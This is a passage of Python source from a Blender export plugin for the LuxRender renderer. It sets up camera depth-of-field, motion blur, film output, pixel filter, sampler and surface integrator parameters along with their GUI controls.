if gui: gui.newline(" DOF:")
lr = luxProp(cam, "camera.lensradius", 0.01)
fs = luxProp(cam, "camera.fstop", 2.8)
if camtype.get() == "perspective":
usefstop = luxProp(cam, "usefstop", "false")
luxBool("usefstop", usefstop, "Use f/stop", "Use f/stop to define DOF effect", gui, 1.0)
LR_SCALE = 1000.0 # lr in metres -> mm
FL_SCALE = 1.0 # fl in mm -> mm
def lr_2_fs(fl, lr):
lr += 0.00000001
return fl / ( 2.0 * lr )
def fs_2_lr(fl, fs):
return fl / ( 2.0 * fs )
if usefstop.get() == 'true':
lr.set(fs_2_lr(fl.get() * FL_SCALE, fs.get()) / LR_SCALE)
luxFloat("fstop", fs, 0.9, 64.0, "fstop", "Defines the lens aperture.", gui)
str += luxFloat("lensradius", lr, 0.0, 1.0, "", "", None)
else:
fs.set(lr_2_fs(fl.get() * FL_SCALE, lr.get() * LR_SCALE))
str += luxFloat("lensradius", lr, 0.0, 1.0, "lens-radius", "Defines the lens radius. Values higher than 0. enable DOF and control the amount", gui)
else:
str += luxFloat("lensradius", lr, 0.0, 1.0, "lens-radius", "Defines the lens radius. Values higher than 0. enable DOF and control the amount", gui)
# focustype = luxProp(cam, "camera.focustype", "autofocus")
# luxOption("focustype", focustype, ["autofocus", "manual", "object"], "Focus Type", "Choose the focus behaviour", gui)
# if focustype.get() == "autofocus":
# str += luxBool("autofocus",luxProp(cam, "camera.autofocus", "true"), "autofocus", "Enable automatic focus", gui)
# if focustype.get() == "object":
# objectfocus = luxProp(cam, "camera.objectfocus", "")
# luxString("objectfocus", objectfocus, "object", "Always focus camera on named object", gui, 1.0)
# dofdist = luxAttr(cam, "dofDist")
# str += luxFloat("focaldistance", dofdist, 0.0, 100.0, "distance", "Distance from the camera at which objects will be in focus. Has no effect if Lens Radius is 0", gui)
# if objectfocus.get() != "":
# try:
# setFocus(objectfocus.get())
# except:
# luxProp(cam, "camera.objectfocus", "").set("")
# Draw.PupMenu("WARNING: focus-object does not match existing object-name")
# if LuxIsGUI: Draw.Redraw()
if True: # focustype.get() == "manual":
dofdist = luxAttr(cam, "dofDist")
str += luxFloat("focaldistance", dofdist, 0.0, 100.0, "distance", "Distance from the camera at which objects will be in focus. Has no effect if Lens Radius is 0", gui)
if gui:
Draw.Button("S", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, "focus selected object", lambda e,v:setFocus("S"))
Draw.Button("C", evtLuxGui, gui.x+gui.h, gui.y-gui.h, gui.h, gui.h, "focus cursor", lambda e,v:setFocus("C"))
useaspect = luxProp(cam, "useaspectratio", "false")
aspectratio = luxProp(cam, "ratio", 1.3333)
if camtype.get() in ["perspective", "orthographic"]:
if context:
if useaspect.get() == "true":
ratio = 1./aspectratio.get()
else:
ratio = float(context.sizeY)/float(context.sizeX)
if ratio < 1.0:
screenwindow = [(2*cam.shiftX-1)*scale, (2*cam.shiftX+1)*scale, (2*cam.shiftY-ratio)*scale, (2*cam.shiftY+ratio)*scale]
else:
screenwindow = [(2*cam.shiftX-1/ratio)*scale, (2*cam.shiftX+1/ratio)*scale, (2*cam.shiftY-1)*scale, (2*cam.shiftY+1)*scale]
# render region option
if context.borderRender:
(x1,y1,x2,y2) = context.border
screenwindow = [screenwindow[0]*(1-x1)+screenwindow[1]*x1, screenwindow[0]*(1-x2)+screenwindow[1]*x2,\
screenwindow[2]*(1-y1)+screenwindow[3]*y1, screenwindow[2]*(1-y2)+screenwindow[3]*y2]
str += "\n \"float screenwindow\" [%f %f %f %f]"%(screenwindow[0], screenwindow[1], screenwindow[2], screenwindow[3])
# Motion Blur Options (common to all cameras)
usemblur = luxProp(cam, "usemblur", "false")
luxCollapse("usemblur", usemblur, "Motion Blur", "Enable Motion Blur", gui, 2.0)
if(usemblur.get() == "true"):
if gui: gui.newline(" Shutter:")
mblurpreset = luxProp(cam, "mblurpreset", "true")
luxBool("mblurpreset", mblurpreset, "Preset", "Enable use of Shutter Presets", gui, 0.4)
if(mblurpreset.get() == "true"):
shutterpresets = ["full frame", "half frame", "quarter frame", "1/25", "1/30", "1/45", "1/60", "1/85", "1/125", "1/250", "1/500"]
shutterpreset = luxProp(cam, "camera.shutterspeedpreset", "full frame")
luxOption("shutterpreset", shutterpreset, shutterpresets, "shutterspeed", "Choose the Shutter speed preset.", gui, 1.0)
fpspresets = ["10 FPS", "12 FPS", "20 FPS", "25 FPS", "29.99 FPS", "30 FPS", "50 FPS", "60 FPS"]
shutfps = luxProp(cam, "camera.shutfps", "25 FPS")
luxOption("shutfps", shutfps, fpspresets, "@", "Choose the number of frames per second as the time base.", gui, 0.6)
sfps = shutfps.get()
fps = 25
if sfps == "10 FPS": fps = 10
elif sfps == "12 FPS": fps = 12
elif sfps == "20 FPS": fps = 20
elif sfps == "25 FPS": fps = 25
elif sfps == "29.99 FPS": fps = 29.99
elif sfps == "30 FPS": fps = 30
elif sfps == "50 FPS": fps = 50
elif sfps == "60 FPS": fps = 60
spre = shutterpreset.get()
open = 0.0
close = 1.0
if spre == "full frame": close = 1.0
elif spre == "half frame": close = 0.5
elif spre == "quarter frame": close = 0.25
elif spre == "1/25": close = 1.0 / 25.0 * fps
elif spre == "1/30": close = 1.0 / 30.0 * fps
elif spre == "1/45": close = 1.0 / 45.0 * fps
elif spre == "1/60": close = 1.0 / 60.0 * fps
elif spre == "1/85": close = 1.0 / 85.0 * fps
elif spre == "1/125": close = 1.0 / 125.0 * fps
elif spre == "1/250": close = 1.0 / 250.0 * fps
elif spre == "1/500": close = 1.0 / 500.0 * fps
str += "\n \"float shutteropen\" [%f]\n \"float shutterclose\" [%f] "%(open,close)
else:
str += luxFloat("shutteropen", luxProp(cam, "camera.shutteropen", 0.0), 0.0, 100.0, "open", "time in seconds when shutter opens", gui, 0.8)
str += luxFloat("shutterclose", luxProp(cam, "camera.shutterclose", 1.0), 0.0, 100.0, "close", "time in seconds when shutter closes", gui, 0.8)
# str += luxOption("shutterdistribution", luxProp(cam, "camera.shutterdistribution", "uniform"), ["uniform", "gaussian"], "distribution", "Choose the shutter sampling distribution.", gui, 2.0)
objectmblur = luxProp(cam, "objectmblur", "true")
luxBool("objectmblur", objectmblur, "Object", "Enable Motion Blur for scene object motions", gui, 1.0)
cammblur = luxProp(cam, "cammblur", "true")
luxBool("cammblur", cammblur, "Camera", "Enable Motion Blur for Camera motion", gui, 1.0)
return str
def get_render_resolution(scn, gui = None):
context = scn.getRenderingContext()
scale = luxProp(scn, "film.scale", "100 %")
scale = int(scale.get()[:-1])
xr = luxAttr(context, "sizeX").get()*scale/100
yr = luxAttr(context, "sizeY").get()*scale/100
return xr, yr
def luxFilm(scn, gui=None):
str = ""
if scn:
filmtype = luxProp(scn, "film.type", "image")
str = luxIdentifier("Film", filmtype, ["image"], "FILM", "select film type", gui)
if filmtype.get() == "image":
context = scn.getRenderingContext()
if context:
if gui: gui.newline(" Resolution:")
xr,yr = get_render_resolution(scn, gui)
luxInt("xresolution", luxAttr(context, "sizeX"), 0, 8192, "X", "width of the render", gui, 0.666)
luxInt("yresolution", luxAttr(context, "sizeY"), 0, 8192, "Y", "height of the render", gui, 0.666)
scale = luxProp(scn, "film.scale", "100 %")
luxOption("", scale, ["400 %", "200 %", "100 %", "75 %", "50 %", "25 %"], "scale", "scale resolution", gui, 0.666)
# render region option
if context.borderRender:
(x1,y1,x2,y2) = context.border
if (x1==x2) and (y1==y2): print("WARNING: empty render-region, use SHIFT-B to set render region in Blender.")
str += "\n \"integer xresolution\" [%d] \n \"integer yresolution\" [%d]"%(xr*(x2-x1), yr*(y2-y1))
else:
str += "\n \"integer xresolution\" [%d] \n \"integer yresolution\" [%d]"%(xr, yr)
# if gui: gui.newline(" Halt:")
# str += luxInt("haltspp", luxProp(scn, "haltspp", 0), 0, 32768, "haltspp", "Stop rendering after specified amount of samples per pixel / 0 = never halt", gui)
# palpha = luxProp(scn, "film.premultiplyalpha", "false")
# str += luxBool("premultiplyalpha", palpha, "premultiplyalpha", "Pre multiply film alpha channel during normalization", gui)
# if gui: gui.newline(" Display:")
# str += luxInt("displayinterval", luxProp(scn, "film.displayinterval", 12), 4, 3600, "interval", "Set display Interval (seconds)", gui)
# if gui: gui.newline(" Write:")
# str += luxInt("writeinterval", luxProp(scn, "film.writeinterval", 120), 12, 3600, "interval", "Set display Interval (seconds)", gui)
# Image File Outputs
# LDR clamping method
# if gui: gui.newline(" Clamping:")
# ldrclampmethod = luxProp(scn, "film.ldr_clamp_method", "lum")
# str += luxOption("ldr_clamp_method", ldrclampmethod, ["lum", "hue", "cut"], "LDR clamping", "Method to clamp high luminance values for LDR output", gui, 0.5)
# if gui: gui.newline()
# OpenEXR Output
# saveexr = luxProp(scn, "film.write_exr", "false")
# str += luxCollapse("write_exr", saveexr, "OpenEXR Output", "Enable OpenEXR output", gui, 2.0)
# if saveexr.get() == "true":
# if gui: gui.newline(" OpenEXR:")
#
# exrchannels = luxProp(scn, "film.write_exr_channels", "RGBA")
# str += luxOption("write_exr_channels", exrchannels, ["Y", "YA", "RGB", "RGBA"], "Channels", "Select channels type to write", gui, 0.5)
# exrres = luxProp(scn, "film.write_exr_halftype", "true")
# str += luxBool("write_exr_halftype", exrres, "16bit Half", "Enable 16bit Half resolution output, otherwise 32bit float", gui, 0.5)
# exrcompression = luxProp(scn, "film.write_exr_compression", "PIZ (lossless)")
# str += luxOption("write_exr_compressiontype", exrcompression, ["RLE (lossless)", "PIZ (lossless)", "ZIP (lossless)", "Pxr24 (lossy)", "None"], "Compression", "Select OpenEXR Compression algorithm to use", gui, 1.0)
#
# exrimaging = luxProp(scn, "film.write_exr_imaging", "true")
# str += luxBool("write_exr_applyimaging", exrimaging, "Apply Imaging/Tonemapping", "Apply Imaging and Tonemapping pipeline", gui, 1.2)
#
# if exrimaging.get()=="true":
# exrgamutclamp = luxProp(scn, "film.write_exr_gamutclamp", "true")
# str += luxBool("write_exr_gamutclamp", exrgamutclamp, "Gamut Clamp", "Clamp out of gamut (bright) pixel values", gui, 0.8)
#
# if gui: gui.newline()
# # Zbuf output
# exrZ = luxProp(scn, "film.write_exr_Z", "true")
# str += luxBool("write_exr_ZBuf", exrZ, "ZBuf", "Enable Z Depth Buffer channel", gui, 0.8)
# if exrZ.get() == "true":
# exrZNormalize = luxProp(scn, "film.write_exr_ZNorm", "None")
# str += luxOption("write_exr_zbuf_normalizationtype", exrZNormalize, ["Camera Start/End clip", "Min/Max", "None"], "ZBuf Normalization", "Select type of normalization to use for Zbuf Depth Map", gui, 1.2)
# PNG Output
# savepng = luxProp(scn, "film.write_png", "true")
# str += luxCollapse("write_png", savepng, "PNG Output", "Enable PNG (Portable Network Graphics) output", gui, 2.0)
#
# if savepng.get() == "true":
# if gui: gui.newline(" PNG:")
# pngchannels = luxProp(scn, "film.write_png_channels", "RGB")
# str += luxOption("write_png_channels", pngchannels, ["Y", "YA", "RGB", "RGBA"], "Channels", "Select channels type to write", gui, 0.5)
# png16bit = luxProp(scn, "film.write_png_16bit", "false")
# str += luxBool("write_png_16bit", png16bit, "16bit", "Enable 16bits per channel resolution PNG output", gui, 0.5)
# pnggamutclamp = luxProp(scn, "film.write_png_gamutclamp", "true")
# str += luxBool("write_png_gamutclamp", pnggamutclamp, "Gamut Clamp", "Clamp out of gamut (bright) pixel values", gui, 1.0)
# Zbuf output
#pngZ = luxProp(scn, "film.write_png_ZBuf", "false")
#str += luxBool("write_png_ZBuf", pngZ, "ZBuf (Separate)", "Enable Z Depth Buffer channel", gui, 0.8)
#if pngZ.get() == "true":
# pngZNormalize = luxProp(scn, "film.write_png_ZNorm", "Min/Max")
# str += luxOption("write_png_zbuf_normalizationtype", pngZNormalize, ["Camera Start/End clip", "Min/Max", "None"], "ZBuf Normalization", "Select type of normalization to use for Zbuf Depth Map", gui, 1.2)
# TGA Output
# savetga = luxProp(scn, "film.write_tga", "false")
# str += luxCollapse("write_tga", savetga, "TGA Output", "Enable TGA output", gui, 2.0)
#
# if savetga.get() == "true":
# if gui: gui.newline(" TGA:")
# tgachannels = luxProp(scn, "film.write_tga_channels", "RGB")
# str += luxOption("write_tga_channels", tgachannels, ["Y", "RGB", "RGBA"], "Channels", "Select channels type to write", gui, 0.5)
# tgagamutclamp = luxProp(scn, "film.write_tga_gamutclamp", "true")
# str += luxBool("write_tga_gamutclamp", tgagamutclamp, "Gamut Clamp", "Clamp out of gamut (bright) pixel values", gui, 1.5)
# Zbuf output
#tgaZ = luxProp(scn, "film.write_tga_ZBuf", "false")
#str += luxBool("write_tga_ZBuf", tgaZ, "ZBuf (Separate)", "Enable Z Depth Buffer channel", gui, 0.8)
#if tgaZ.get() == "true":
# tgaZNormalize = luxProp(scn, "film.write_tga_ZNorm", "Min/Max")
# str += luxOption("write_tga_zbuf_normalizationtype", tgaZNormalize, ["Camera Start/End clip", "Min/Max", "None"], "ZBuf Normalization", "Select type of normalization to use for Zbuf Depth Map", gui, 1.2)
# override output image dir in case of command line batch mode
overrideop = luxProp(scn, "overrideoutputpath", "")
if overrideop.get() != "":
filebase = os.path.splitext(os.path.basename(Blender.Get('filename')))[0]
filename = overrideop.get() + "/" + filebase + "-%05d" % (Blender.Get('curframe'))
str += "\n \"string filename\" [\"%s\"]"%(filename)
else:
fn = luxProp(scn, "filename", "default-%05d" % (Blender.Get('curframe')))
str += luxString("filename", fn, "File name", "save file name", None)
# if gui: gui.newline(" Resume:")
# resumeflm = luxProp(scn, "film.write_resume_flm", "false")
# str += luxBool("write_resume_flm", resumeflm, "Write/Use FLM", "Write a resume fleximage .flm file, or resume rendering if it already exists", gui)
# restartflm = luxProp(scn, "film.restart_resume_flm", "true")
# str += luxBool("restart_resume_flm", restartflm, "Restart/Erase", "Restart with a black flm, even it a previous flm exists", gui)
# if gui: gui.newline(" Reject:")
# str += luxInt("reject_warmup", luxProp(scn, "film.reject_warmup", 128), 0, 32768, "warmup_spp", "Specify amount of samples per pixel for high intensity rejection", gui)
# debugmode = luxProp(scn, "film.debug", "false")
# str += luxBool("debug", debugmode, "debug", "Turn on debug reporting and switch off reject", gui)
# Colorspace
# if gui: gui.newline(" Colorspace:")
#
# cspaceusepreset = luxProp(scn, "film.colorspaceusepreset", "true")
# luxBool("colorspaceusepreset", cspaceusepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
#
# # Default values for 'sRGB - HDTV (ITU-R BT.709-5)'
# cspacewhiteX = luxProp(scn, "film.cspacewhiteX", 0.314275)
# cspacewhiteY = luxProp(scn, "film.cspacewhiteY", 0.329411)
# cspaceredX = luxProp(scn, "film.cspaceredX", 0.63)
# cspaceredY = luxProp(scn, "film.cspaceredY", 0.34)
# cspacegreenX = luxProp(scn, "film.cspacegreenX", 0.31)
# cspacegreenY = luxProp(scn, "film.cspacegreenY", 0.595)
# cspaceblueX = luxProp(scn, "film.cspaceblueX", 0.155)
# cspaceblueY = luxProp(scn, "film.cspaceblueY", 0.07)
# gamma = luxProp(scn, "film.gamma", 2.2)
#
# if(cspaceusepreset.get() == "true"):
# # preset controls
# cspace = luxProp(scn, "film.colorspace", "sRGB - HDTV (ITU-R BT.709-5)")
# cspaces = ["sRGB - HDTV (ITU-R BT.709-5)", "ROMM RGB", "Adobe RGB 98", "Apple RGB", "NTSC (FCC 1953, ITU-R BT.470-2 System M)", "NTSC (1979) (SMPTE C, SMPTE-RP 145)", "PAL/SECAM (EBU 3213, ITU-R BT.470-6)", "CIE (1931) E"]
# luxOption("colorspace", cspace, cspaces, "Colorspace", "select output working colorspace", gui, 1.6)
#
# if cspace.get()=="ROMM RGB":
# cspacewhiteX.set(0.346); cspacewhiteY.set(0.359) # D50
# cspaceredX.set(0.7347); cspaceredY.set(0.2653)
# cspacegreenX.set(0.1596); cspacegreenY.set(0.8404)
# cspaceblueX.set(0.0366); cspaceblueY.set(0.0001)
# elif cspace.get()=="Adobe RGB 98":
# cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
# cspaceredX.set(0.64); cspaceredY.set(0.34)
# cspacegreenX.set(0.21); cspacegreenY.set(0.71)
# cspaceblueX.set(0.15); cspaceblueY.set(0.06)
# elif cspace.get()=="Apple RGB":
# cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
# cspaceredX.set(0.625); cspaceredY.set(0.34)
# cspacegreenX.set(0.28); cspacegreenY.set(0.595)
# cspaceblueX.set(0.155); cspaceblueY.set(0.07)
# elif cspace.get()=="NTSC (FCC 1953, ITU-R BT.470-2 System M)":
# cspacewhiteX.set(0.310); cspacewhiteY.set(0.316) # C
# cspaceredX.set(0.67); cspaceredY.set(0.33)
# cspacegreenX.set(0.21); cspacegreenY.set(0.71)
# cspaceblueX.set(0.14); cspaceblueY.set(0.08)
# elif cspace.get()=="NTSC (1979) (SMPTE C, SMPTE-RP 145)":
# cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
# cspaceredX.set(0.63); cspaceredY.set(0.34)
# cspacegreenX.set(0.31); cspacegreenY.set(0.595)
# cspaceblueX.set(0.155); cspaceblueY.set(0.07)
# elif cspace.get()=="PAL/SECAM (EBU 3213, ITU-R BT.470-6)":
# cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
# cspaceredX.set(0.64); cspaceredY.set(0.33)
# cspacegreenX.set(0.29); cspacegreenY.set(0.60)
# cspaceblueX.set(0.15); cspaceblueY.set(0.06)
# elif cspace.get()=="CIE (1931) E":
# cspacewhiteX.set(0.333); cspacewhiteY.set(0.333) # E
# cspaceredX.set(0.7347); cspaceredY.set(0.2653)
# cspacegreenX.set(0.2738); cspacegreenY.set(0.7174)
# cspaceblueX.set(0.1666); cspaceblueY.set(0.0089)
#
# whitepointusecspace = luxProp(scn, "film.whitepointusecolorspace", "true")
# luxBool("whitepointusecolorspace", whitepointusecspace, "Colorspace Whitepoint", "Use default whitepoint for selected colorspace", gui, 1.0)
# gammausecspace = luxProp(scn, "film.gammausecolorspace", "true")
# luxBool("gammausecolorspace", gammausecspace, "Colorspace Gamma", "Use default output gamma for selected colorspace", gui, 1.0)
#
# if(whitepointusecspace.get() == "false"):
# if gui: gui.newline(" Whitepoint:")
# whitepointusepreset = luxProp(scn, "film.whitepointusepreset", "true")
# luxBool("whitepointusepreset", whitepointusepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
#
# if(whitepointusepreset.get() == "true"):
# whitepointpresets = ["E", "D50", "D55", "D65", "D75", "A", "B", "C", "9300", "F2", "F7", "F11"]
# whitepointpreset = luxProp(scn, "film.whitepointpreset", "D65")
# luxOption("whitepointpreset", whitepointpreset, whitepointpresets, " PRESET", "select Whitepoint preset", gui, 1.6)
#
# if whitepointpreset.get()=="E": cspacewhiteX.set(0.333); cspacewhiteY.set(0.333)
# elif whitepointpreset.get()=="D50": cspacewhiteX.set(0.346); cspacewhiteY.set(0.359)
# elif whitepointpreset.get()=="D55": cspacewhiteX.set(0.332); cspacewhiteY.set(0.347)
# elif whitepointpreset.get()=="D65": cspacewhiteX.set(0.313); cspacewhiteY.set(0.329)
# elif whitepointpreset.get()=="D75": cspacewhiteX.set(0.299); cspacewhiteY.set(0.315)
# elif whitepointpreset.get()=="A": cspacewhiteX.set(0.448); cspacewhiteY.set(0.407)
# elif whitepointpreset.get()=="B": cspacewhiteX.set(0.348); cspacewhiteY.set(0.352)
# elif whitepointpreset.get()=="C": cspacewhiteX.set(0.310); cspacewhiteY.set(0.316)
# elif whitepointpreset.get()=="9300": cspacewhiteX.set(0.285); cspacewhiteY.set(0.293)
# elif whitepointpreset.get()=="F2": cspacewhiteX.set(0.372); cspacewhiteY.set(0.375)
# elif whitepointpreset.get()=="F7": cspacewhiteX.set(0.313); cspacewhiteY.set(0.329)
# elif whitepointpreset.get()=="F11": cspacewhiteX.set(0.381); cspacewhiteY.set(0.377)
# else:
# luxFloat("white X", cspacewhiteX, 0.0, 1.0, "white X", "Whitepoint X weight", gui, 0.8)
# luxFloat("white Y", cspacewhiteY, 0.0, 1.0, "white Y", "Whitepoint Y weight", gui, 0.8)
#
# if(gammausecspace.get() == "false"):
# if gui: gui.newline(" Gamma:")
# luxFloat("gamma", gamma, 0.1, 6.0, "gamma", "Output and RGC Gamma", gui, 2.0)
# else:
# # manual controls
# luxFloat("white X", cspacewhiteX, 0.0, 1.0, "white X", "Whitepoint X weight", gui, 0.8)
# luxFloat("white Y", cspacewhiteY, 0.0, 1.0, "white Y", "Whitepoint Y weight", gui, 0.8)
# luxFloat("red X", cspaceredX, 0.0, 1.0, "red X", "Red component X weight", gui, 1.0)
# luxFloat("red Y", cspaceredY, 0.0, 1.0, "red Y", "Red component Y weight", gui, 1.0)
# luxFloat("green X", cspacegreenX, 0.0, 1.0, "green X", "Green component X weight", gui, 1.0)
# luxFloat("green Y", cspacegreenY, 0.0, 1.0, "green Y", "Green component Y weight", gui, 1.0)
# luxFloat("blue X", cspaceblueX, 0.0, 1.0, "blue X", "Blue component X weight", gui, 1.0)
# luxFloat("blue Y", cspaceblueY, 0.0, 1.0, "blue Y", "Blue component Y weight", gui, 1.0)
# if gui: gui.newline(" Gamma:")
# luxFloat("gamma", gamma, 0.1, 6.0, "gamma", "Output and RGC Gamma", gui, 2.0)
#
# str += "\n \"float colorspace_white\" [%f %f]"%(cspacewhiteX.get(), cspacewhiteY.get())
# str += "\n \"float colorspace_red\" [%f %f]"%(cspaceredX.get(), cspaceredY.get())
# str += "\n \"float colorspace_green\" [%f %f]"%(cspacegreenX.get(), cspacegreenY.get())
# str += "\n \"float colorspace_blue\" [%f %f]"%(cspaceblueX.get(), cspaceblueY.get())
# str += "\n \"float gamma\" [%f]"%(gamma.get())
return str
def luxPixelFilter(scn, gui=None):
global icon_c_filter
str = ""
if scn:
filtertype = luxProp(scn, "pixelfilter.type", "mitchell")
str = luxIdentifier("PixelFilter", filtertype, ["box", "gaussian", "mitchell", "sinc", "triangle"], "FILTER", "select pixel filter type", gui, icon_c_filter)
# Advanced toggle
parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
showadvanced = luxProp(scn, "pixelfilter.showadvanced", parammodeadvanced.get())
luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
# Help toggle
showhelp = luxProp(scn, "pixelfilter.showhelp", "false")
luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
if filtertype.get() == "box":
if showadvanced.get()=="true":
# Advanced parameters
if gui: gui.newline()
str += luxFloat("xwidth", luxProp(scn, "pixelfilter.box.xwidth", 0.5), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
str += luxFloat("ywidth", luxProp(scn, "pixelfilter.box.ywidth", 0.5), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
if filtertype.get() == "gaussian":
if showadvanced.get()=="true":
# Advanced parameters
if gui: gui.newline()
str += luxFloat("xwidth", luxProp(scn, "pixelfilter.gaussian.xwidth", 2.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
str += luxFloat("ywidth", luxProp(scn, "pixelfilter.gaussian.ywidth", 2.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
if gui: gui.newline()
str += luxFloat("alpha", luxProp(scn, "pixelfilter.gaussian.alpha", 2.0), 0.0, 10.0, "alpha", "Gaussian rate of falloff. Lower values give blurrier images", gui)
if filtertype.get() == "mitchell":
if showadvanced.get()=="false":
# Default parameters
if gui: gui.newline("", 8, 0, None, [0.4,0.4,0.4])
slidval = luxProp(scn, "pixelfilter.mitchell.sharp", 0.25)
luxFloat("sharpness", slidval, 0.0, 1.0, "sharpness", "Specify amount between blurred (left) and sharp/ringed (right)", gui, 2.0, 1)
# rule: B + 2*c = 1.0
C = slidval.getFloat() * 0.5
B = 1.0 - slidval.getFloat()
str += "\n \"float B\" [%f]"%(B)
str += "\n \"float C\" [%f]"%(C)
if showadvanced.get()=="true":
# Advanced parameters
if gui: gui.newline()
str += luxFloat("xwidth", luxProp(scn, "pixelfilter.mitchell.xwidth", 2.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
str += luxFloat("ywidth", luxProp(scn, "pixelfilter.mitchell.ywidth", 2.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
if gui: gui.newline()
optmode = luxProp(scn, "pixelfilter.mitchell.optmode", "slider")
luxOption("optmode", optmode, ["slider", "preset", "manual"], "Mode", "Mode of configuration", gui, 0.5)
if(optmode.get() == "slider"):
slidval = luxProp(scn, "pixelfilter.mitchell.sharp", 0.33)
luxFloat("sharpness", slidval, 0.0, 1.0, "sharpness", "Specify amount between blurred (left) and sharp/ringed (right)", gui, 1.5, 1)
# rule: B + 2*c = 1.0
C = slidval.getFloat() * 0.5
B = 1.0 - slidval.getFloat()
str += "\n \"float B\" [%f]"%(B)
str += "\n \"float C\" [%f]"%(C)
elif(optmode.get() == "preset"):
print("not implemented")
else:
str += luxFloat("B", luxProp(scn, "pixelfilter.mitchell.B", 0.3333), 0.0, 1.0, "B", "Specify the shape of the Mitchell filter. Often best result is when B + 2C = 1", gui, 0.75)
str += luxFloat("C", luxProp(scn, "pixelfilter.mitchell.C", 0.3333), 0.0, 1.0, "C", "Specify the shape of the Mitchell filter. Often best result is when B + 2C = 1", gui, 0.75)
if filtertype.get() == "sinc":
if showadvanced.get()=="true":
# Advanced parameters
if gui: gui.newline()
str += luxFloat("xwidth", luxProp(scn, "pixelfilter.sinc.xwidth", 4.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
str += luxFloat("ywidth", luxProp(scn, "pixelfilter.sinc.ywidth", 4.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
if gui: gui.newline()
str += luxFloat("tau", luxProp(scn, "pixelfilter.sinc.tau", 3.0), 0.0, 10.0, "tau", "Permitted number of cycles of the sinc function before it is clamped to zero", gui)
if filtertype.get() == "triangle":
if showadvanced.get()=="true":
# Advanced parameters
if gui: gui.newline()
str += luxFloat("xwidth", luxProp(scn, "pixelfilter.triangle.xwidth", 2.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
str += luxFloat("ywidth", luxProp(scn, "pixelfilter.triangle.ywidth", 2.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
return str
def luxSampler(scn, gui=None):
global icon_c_sampler, icon_help
str = ""
if scn:
samplertype = luxProp(scn, "sampler.type", "lowdiscrepancy")
str = luxIdentifier("Sampler", samplertype, ["lowdiscrepancy", "random"], "SAMPLER", "select sampler type", gui, icon_c_sampler)
# Advanced toggle
parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
showadvanced = luxProp(scn, "sampler.showadvanced", parammodeadvanced.get())
luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
# Help toggle
showhelp = luxProp(scn, "sampler.showhelp", "false")
luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
if samplertype.get() == "lowdiscrepancy":
if gui: gui.newline(" PixelSampler:")
str += luxInt("pixelsamples", luxProp(scn, "sampler.lowdisc.pixelsamples", 4), 1, 2048, "samples", "Average number of samples taken per pixel. More samples create a higher quality image at the cost of render time", gui)
if samplertype.get() == "random":
if gui: gui.newline(" PixelSampler:")
str += luxInt("pixelsamples", luxProp(scn, "sampler.random.pixelsamples", 4), 1, 512, "pixelsamples", "Allows you to specify how many samples per pixel are computed", gui)
return str
def luxSurfaceIntegrator(scn, gui=None):
global icon_c_integrator
str = ""
if scn:
integratortype = luxProp(scn, "sintegrator.type", "directlighting")
str = luxIdentifier("SurfaceIntegrator", integratortype, ["directlighting", "path", "photonmap", "irradiancecache", "igi", "dipolesubsurface" ], "INTEGRATOR", "select surface integrator type", gui, icon_c_integrator)
# Advanced toggle
parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
showadvanced = luxProp(scn, "sintegrator.showadvanced", parammodeadvanced.get())
luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
# Help toggle
showhelp = luxProp(scn, "sintegrator.showhelp", "false")
luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
if integratortype.get() == "directlighting":
# Default parameters
if gui: gui.newline(" Depth:", 8, 0, None, [0.4,0.4,0.4])
str += luxInt("maxdepth", luxProp(scn, "sintegrator.dlighting.maxdepth", 8), 0, 2048, "bounces", "The maximum recursion depth for ray casting", gui, 2.0)
if integratortype.get() == "path":
# Default parameters
if gui: gui.newline(" Depth:", 8, 0, None, [0.4,0.4,0.4])
str += luxInt("maxdepth", luxProp(scn, "sintegrator.path.maxdepth", 10), 0, 2048, "bounces", "The maximum recursion depth for ray casting", gui, 1.0)
if integratortype.get() == "photonmap":
if gui: gui.newline(" Render:")
str += luxInt("maxphotondepth", luxProp(scn, "sintegrator.photonmap.maxphotondepth", 10), 1, 1024, "maxphotondepth", "The maximum recursion depth of photon tracing", gui)
str += luxInt("maxdepth", luxProp(scn, "sintegrator.photonmap.maxdepth", 6), 1, 1024, "maxdepth", "The maximum recursion depth of specular reflection and refraction", gui)
str += luxFloat("maxdist", luxProp(scn, "sintegrator.photonmap.maxdist", 0.1), 0.0, 10.0, "maxdist", "The maximum distance between a point being shaded and a photon that can contribute to that point", gui)
str += luxInt("nused", luxProp(scn, "sintegrator.photonmap.nused", 50), 0, 1000000, "nused", "The number of photons to use in density estimation", gui)
if gui: gui.newline(" Photons:")
str += luxInt("indirectphotons", luxProp(scn, "sintegrator.photonmap.idphotons", 200000), 0, 10000000, "indirect", "The number of photons to shoot for indirect lighting during preprocessing of the photon map", gui)
str += luxInt("causticphotons", luxProp(scn, "sintegrator.photonmap.cphotons", 20000), 0, 10000000, "caustic", "The number of photons to shoot for caustics during preprocessing of the photon map", gui)
if gui: gui.newline(" FinalGather:")
fg = luxProp(scn, "sintegrator.photonmap.fgather", "true")
str += luxBool("finalgather", fg, "finalgather", "Enable use of final gather during rendering", gui)
